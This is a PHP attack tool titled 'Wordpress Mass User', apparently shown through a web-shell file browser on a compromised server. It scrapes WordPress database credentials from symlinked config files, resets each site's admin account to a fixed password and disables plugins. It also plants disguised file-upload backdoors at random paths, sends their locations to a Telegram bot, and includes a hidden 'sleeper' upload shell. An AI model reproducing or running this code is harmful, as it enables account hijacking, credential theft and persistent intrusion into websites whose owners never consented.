0byt3m1n1
Path:
/
var
/
www
/
clients
/
client38
/
web37
/
web
/
stats
/
2023-10
/
[
Home
]
File: priv8sym_source.php
<?php function http_get($url) { $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $CHATID = 123456789; $BOTTOKEN = ""; echo ' <html><head><title>Wordpress Mass User</title><style type="text/css"> body { background-color:#000000; background-image:url("https://i.imgur.com/hLcQCBx.gif"); background-repeat:repeat; margin-top:20px; font-family:"Agency FB"; font-size:12pt; color:#ffffff; } input,textarea,select{ font-weight: bold; color: #cccccc; dashed #ffffff; border: 1px solid #2C2C2C; background-color: #080808 } a { background-color: #151515; vertical-align: bottom; color: #d0c8c8; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: thin solid #000000; } a:hover { background-color: #080808; vertical-align: bottom; color: #333; text-decoration: none; font-size: 20px; margin: 8px; padding: 6px; border: #d53b3b; } .style1 { text-align: center; color: #d9910e; } .style2 { color: #d9910e; font-weight: bold; } .style3 { color: #d9910e; } textarea{ background:transparent; border: 1px solid #2d2b2b; width: 80%; height: 400px; padding-left: 5px; margin: 10px auto; font-family:Homenaje; color: #ffffff; font-size:13px; } </style></head> '; @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @ini_set('output_buffering', 0); @ini_set('display_errors', 0); $pass = md5($Password); function GrabUrl($url, $type) { $urlArray = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $regex = '|<a.*?href="(.*?)"|'; preg_match_all($regex, $result, $parts); $links = $parts[1]; foreach ($links as $link) { array_push($urlArray, $link); } curl_close($ch); foreach ($urlArray as $value) { $lol = "$url$value"; if (preg_match("#$type#is", $lol) or preg_match("/wp/i", $lol)) { echo "$lol "; } } } function HEx($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) return FALSE; if (strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } echo "<center> <font color='white' size='40'>Wordpress Mass User</font> <table width='100%' cellspacing='0' cellpadding='0' class='tb1' > <td height='10' align='left' class='td1'></td></tr><tr><td width='100%' align='center' valign='top' rowspan='1'><font color='red' face='comic sans ms'size='1'><b> <font color=#ff9933> </font><br><font color=white>--==[[Telegram]]==--</font><br><font color=#ff9933>@Mr_Ti74N<br> </table> </table> <div align=center><font color=#ff9933 font size=5><marquee behavior='scroll' direction='left' scrollamount='2' scrolldelay='5' width='70%'><p> <span class='footerlink'> Shop Ti74N5</span> </marquee><br><br></font></div> <form method='post'> Link Config: <br> <input type='text' name='linkconf' height='10' size='50' placeholder='http://url.com/priv8_sym404/'><br><br> <input type='submit' style='width: 150px;' name='gass' value='Submit!!'> </form></center>"; if ($_POST['gass']) { echo "<center> <form method='post'> Link Config: <br> <textarea name='link'>"; GrabUrl($_POST['linkconf'], 'wordpress'); echo "</textarea><br><br> <input type='submit' style='width: 200px;' name='edittitle' value='Submit!!'> </form></center>"; } if ($_POST['edittitle']) { $title = htmlspecialchars($_POST['title']); $id = $_POST['id']; $content = $_POST['content']; $postname = $_POST['name']; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode(" ", $_POST['link']); foreach ($link as $dir_config) { $config = anucurl($dir_config); preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m); $dbname1 = $m[1]; preg_match('/define.*DB_NAME.*\'(.*)\'/', $config, $m); $dbname2 = $m[1]; $dbname = ("$dbname1$dbname2"); preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m); $dbuser1 = $m[1]; preg_match('/define.*DB_USER.*\'(.*)\'/', $config, $m); $dbuser2 = $m[1]; $dbuser = ("$dbuser1$dbuser2"); preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m); $dbpass1 = $m[1]; preg_match('/define.*DB_PASSWORD.*\'(.*)\'/', $config, $m); $dbpass2 = $m[1]; $dbpass = ("$dbpass1$dbpass2"); preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m); $dbhost1 = $m[1]; preg_match('/define.*DB_HOST.*\'(.*)\'/', $config, $m); $dbhost2 = $m[1]; $dbhost = ("$dbhost1$dbhost2"); preg_match("/\$table_prefix.+?\"(.+?)\".+/", $config, $m); $dbprefix0 = $m[1]; $dbprefix1 = HEx($config, "table_prefix = '", "'"); $dbprefix2 = HEx($config, "table_prefix = '", "'"); $dbprefix3 = HEx($config, "table_prefix= '", "'"); $dbprefix4 = HEx($config, "table_prefix = '", "'"); $dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4"); $connect = mysqli_connect($dbhost, $dbuser, $dbpass, $dbname); if ($connect) { $query1 = mysqli_query($connect, "select * from " . $dbprefix . "options where option_name='siteurl'"); while ($siteurl = mysqli_fetch_array($query1)) { $site_url = $siteurl['option_value']; } $Username = "admin"; $pass = "092c88e0f86127e631d50879a4c4f25c"; $Password = "Ti74N_Fuck=wp"; $query3 = mysqli_query($connect, "update " . $dbprefix . "options set option_name='active_plugins1' where option_name='active_plugins'"); $query2 = mysqli_query($connect, "update " . $dbprefix . "users set user_login='$Username',user_pass='$pass' where id='1'"); if ($query2) { echo "<center>$site_url/wp-login.php</a><br><br>UserName : admin<br><br>Password : Ti74N_Fuck=wp<br><br></span></center>"; } } } } @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('display_errors', 0); echo '</html>'; session_start(); if (!$_SESSION['logdsx']) { $ban_folder = array('', ''); $check3 = $_SERVER['DOCUMENT_ROOT']; $zz = scandir($check3); function random_name($a) { $string = str_split("azertyuiopqsdfghjklmwxcvbn"); $s = ""; for ($i = 0;$i <= $a;$i++) { $s.= $string[rand(0, count($string) - 1) ]; } return "/wp-" . $s . ".php"; } $check4 = array(); $check4[] = $_SERVER['DOCUMENT_ROOT']; $i2 = 0; for ($i = 0;$i <= count($check4);$i++) { $z = scandir($check4[$i]); $z = array_diff($z, array('.', '..')); foreach ($z as $b) { // if(in_array($b,$ban_folder)) continue; if (is_dir($check4[$i] . '/' . $b)) { $check4[] = $check4[$i] . '/' . $b; } } if ($i2 >= 50) break; $i2+= 1; } $text3 = '<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don\'t have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html> if($_GET["payload"] == "sent"){ $xx = $_FILES["file"]["name"]; $yy = $_FILES["file"]["tmp_name"];'; $text3.= 'echo ("'; $text3.= "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='upload' /> </form>"; $text3.= '");'; $text3.= 'move_uploaded_file($yy,$xx); }'; if (count($check4) > 0) { $finalpath = array(); $finalpathfiles = array(); $bilmsg = ""; $i = 0; do { $path = $check4[rand(0, count($check4) - 1) ]; if (!in_array($path, $finalpath) and $path != $_SERVER['DOCUMENT_ROOT'] and $path != __DIR__) { $save = $path . random_name(4); $finalpathfiles[] = $save; $bilmsg.= "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " Path : " . $save . " "; $finalpath[] = $path; $open3 = fopen($save, 'w'); fwrite($open3, $text3); fclose($open3); } $_SESSION['logdsx'] = True; } while (count($finalpathfiles) < 3); } $zbi = array($CHATID); foreach ($zbi as $user_id) { $website = "https://api.telegram.org/bot".$BOTTOKEN; $params = ['chat_id' => $user_id, 'text' => $bilmsg, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } } $message = $_GET['sleeper']; if ($message == 'washere') { $xx = $_FILES['file']['name']; $yy = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='upload' /> </form>"; move_uploaded_file($yy, $xx); } ?>